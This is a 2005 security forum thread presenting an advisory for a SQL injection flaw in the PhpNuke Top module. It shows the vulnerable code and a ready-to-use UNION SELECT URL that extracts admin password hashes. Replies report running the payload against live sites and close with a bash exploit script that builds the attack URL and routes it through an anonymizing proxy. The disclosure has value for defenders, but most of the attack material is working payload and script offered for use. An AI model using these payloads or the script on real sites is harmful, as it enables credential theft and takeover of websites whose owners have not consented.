Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 110
Members: 0
Total: 110
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> General discussion -> SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module
PostPosted: Wed Apr 06, 2005 6:43 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




{================================================================================}
{ [waraxe-2005-SA#041] }
{================================================================================}
{ }
{ [ Critical Sql Injection in PhpNuke 6.x-7.6 Top module ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 06. April 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-41.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular opensource content management system, written in php by
Francisco Burzi. This CMS is used on many thousands websites, because it's
freeware, easy to install and manage and has broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Like title says, this time the sql injection security hole have been found in
phpnuke "Top" module. Lets look @ source code of the phpnuke 7.6 top module
index file (/modules/Top/index.php) ~ line 186:

[original source code]

/* Top 10 Polls */

$result8 = $db->sql_query("select * from ".$prefix."_poll_desc $queryplang");

if ($db->sql_numrows($result8)>0) {
echo "<table border=\"0\" cellpadding=\"10\" width=\"100%\"><tr><td align=\"left\">\n"
."<font class=\"option\"><b>$top "._VOTEDPOLLS."</b></font><br><br><font class=\"content\">\n";
$lugar = 1;

$result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM ".$prefix."_poll_desc
$querylang order by voters DESC limit 0,$top", $dbi);

$counter = 0;

[/original source code]

And what's the problem? It appears, that variable "$querylang" is uninitialized. So, if we
will "poison" php variable space through GET/POST/COOKIE, then sql query manipulation is
possible.

[real life exploit]

http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION
%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*

[/real life exploit]


... and as result we can see md5 hashes of all the admin passwords in place, where normally
top 10 votes can be seen Smile
Of course, mysql version 4.x must be used with enabled union functionality. And if there are
Sentinel or similar protection systems installed, additional measures must be used to evade them.

Have a nice day!


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For help look @ http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free Base64 decoder and encoder - http://base64-encoder-online.waraxe.us/

SiteMapper - free php script for phpNuke powered websites -
newest version 0.4 can be downloaded @ http://sitemapper.waraxe.us/


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to LINUX, murdock, g0df4th3r, slimjim100, shai-tan, y3dips and
all other active members from my forum !

Special greets to Heintz - congrats about phpbb sploit finding !

Tervitused - Raido Kerna !

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


Last edited by waraxe on Thu Jun 22, 2006 1:11 pm; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 06, 2005 7:10 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




Wooow Waraxe!!!!!! Nice one! Very Happy

I try it now immediatly!

Salut!
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 9:57 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




By the way, i found this sql injection bug many time ago, somewhere november 2004, and had not published it yet. More than 3 month was passed but nobody has found that little security bug Laughing
Even worst, this bug exists even in very old nuke versions, maybe 5.x too, have not tested... Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 06, 2005 10:12 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




Jejeje, as we say in spain: "Lo bueno se hace esperar" Wink
(In english means: "Good things make you wait", or something like this Razz)
View user's profile Send private message
PostPosted: Thu Apr 07, 2005 7:31 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




there you go waraxe, step ahead to back on track

maybe u could input it on your SQLaxe library Laughing

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Thu Apr 07, 2005 10:22 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




good work waraxe Smile
View user's profile Send private message Visit poster's website
PostPosted: Thu Apr 07, 2005 10:33 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Thanks, mate Very Happy

By the way - new advisory will come out somewhere next week and it will be not about phpnuke, but some other widely-used software Wink

So, stay tuned and check bugtraq and my forum Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 9:43 am Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




keep working..

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 12:12 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.

Dial up is good for somethings. Specialy when my IP changes everytime I logon. Lets me not get effected by sentinal. lol

Thanks for the name mention. That makes me proud.

BTW I just got all my hair shaved off. So I look like a skin head. Laughing

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 12:28 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




Wow! My name is also mentioned! :_ )
Thanks waraxe!
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 12:34 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Dam you Laughing

You got your name mention first Cool

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 2:15 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




shai-tan wrote:
Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.

Dial up is good for somethings. Specialy when my IP changes everytime I logon. Lets me not get effected by sentinal. lol

Thanks for the name mention. That makes me proud.

BTW I just got all my hair shaved off. So I look like a skin head. Laughing



There are many restricting factors to be that exploit successful:

1. UNION functionality means that mysql engine must be > 4.x
2. there must be Top module activated
3. if there is not enough voted polls, sploit will not work

etc ...

But real-life tests will show, that there is a lots of phpnuke driven websites waiting for pach Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 2:46 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




Here are the typical erros I get using this exploit:

Sometimes returns:

Code:
10 primeras encuestas m?s votadas

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414

10 autores m?s activos


Sometimes simply appears nothing:

Code:
10 primeras encuestas m?s votadas


10 autores m?s activos


And sometimes simply...works! Wink http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 2:51 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yes, that's it:

Case 1 - mysql 3.x without UNION functionality:

Code:
10 primeras encuestas m?s votadas

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414

10 autores m?s activos




case 2 - not enough votes or votes disabled:

Code:
10 primeras encuestas m?s votadas


10 autores m?s activos


And if you are lucky enough:

Quote:
http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg


Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 8:08 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Look here for sploit derivation:

http://www.milw0rm.com/id.php?id=921

Code:

#/bin/bash

# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
# works thou /str0ke

#
# PHPNuke Top Module Remote SQL Injection
# by Fabrizi Andrea 2005
# andrea.fabrizi [at] gmail.com
#
# Work with the PHPNuke latest version!
#

URL=$1;
PATH="$2/";
ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";

echo -e "\n PHPNuke Top Module Remote SQL Injection"
echo -e " by Fabrizi Andrea 2005"

if [ "$URL" = "" ]; then
echo -e "\n USAGE: $0 [URL] [NukePath]"
echo -e " Example: $0 www.site.net phpNuke\n"
exit
fi;

if [ $PATH = "/" ]; then PATH=""; fi;
#anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

#query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
echo -e " - Direct Query URL: " $query_url "\n";
echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n"
# milw0rm.com [2005-04-07]


Nice one Very Happy
View user's profile Send private message Send e-mail Visit poster's website
SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module
www.waraxe.us Forum Index -> General discussion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.047 Seconds